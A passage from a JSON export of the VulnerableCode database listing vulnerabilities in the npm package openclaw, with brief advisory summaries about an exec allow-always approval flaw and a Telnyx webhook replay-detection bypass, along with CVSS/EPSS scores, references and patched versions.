"VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-35620", "GHSA-39mp-545q-w789" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j96c-kau3-7fag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89044?format=api", "vulnerability_id": "VCID-jbwa-scg3-efeq", "summary": "OpenClaw gateway exec allow-always over-trusts positional carrier executables\n## Summary\n\nAllow-always persistence could trust wrapper carrier executables instead of the actual invoked target when commands were routed through dispatch wrappers.\n\n## Impact\n\nA one-time approval could persist a broader future allowlist entry than the operator intended, weakening execution approval boundaries.\n\n## Affected Component\n\n`src/infra/exec-approvals-allowlist.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `9ec44fad39` (`Exec approvals: reject wrapper carrier allow-always targets`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41380", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08327", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08321", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08339", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41380" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/9ec44fad390f0bc1c29c3cc418b322560cb0222b", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/9ec44fad390f0bc1c29c3cc418b322560cb0222b" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p4x4-2r7f-wjxg", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p4x4-2r7f-wjxg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41380", "reference_id": "CVE-2026-41380", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41380" }, { "reference_url": "https://github.com/advisories/GHSA-p4x4-2r7f-wjxg", "reference_id": "GHSA-p4x4-2r7f-wjxg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p4x4-2r7f-wjxg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41380", "GHSA-p4x4-2r7f-wjxg" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jbwa-scg3-efeq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89491?format=api", "vulnerability_id": "VCID-jdqk-kv8u-xqa9", "summary": "OpenClaw: Telnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding\n## Summary\nTelnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 replay hashing treated equivalent Telnyx Base64/Base64URL signatures as distinct requests, but signature verification still held, so lower to low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `ad77666054651c1fd77b1dc60fd6a8db6600a29a` — 2026-03-30T20:01:43+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41351", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.1326", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13224", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13264", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41351" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ad77666054651c1fd77b1dc60fd6a8db6600a29a", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/ad77666054651c1fd77b1dc60fd6a8db6600a29a" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37v6-fxx8-xjmx", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37v6-fxx8-xjmx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41351", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": 